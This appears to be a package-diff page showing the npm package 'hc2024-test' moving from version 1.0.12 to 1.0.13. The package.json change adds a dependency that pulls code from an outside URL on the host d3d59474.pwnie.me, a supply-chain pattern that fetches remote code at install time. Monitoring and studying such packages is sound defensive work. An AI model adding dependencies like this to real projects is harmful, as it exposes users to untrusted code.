hc2024-test 1.0.12 → 1.0.13

Sign up to get free protection for your applications and to get access to all the features.
Files changed (1) hide show
  1. package/package.json +3 -3
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "hc2024-test",
3
- "version": "1.0.12",
3
+ "version": "1.0.13",
4
4
  "main": "index.tsx",
5
5
  "type": "module",
6
6
  "scripts": {
@@ -9,8 +9,8 @@
9
9
  "author": "",
10
10
  "license": "ISC",
11
11
  "description": "",
12
- "bin": {
13
- "@test/asdfadsf": "https://d3d59474.pwnie.me"
12
+ "dependencies": {
13
+ "asdfadsf": "https://d3d59474.pwnie.me"
14
14
  },
15
15
  "types": "./lib/main.d.ts"
16
16
  }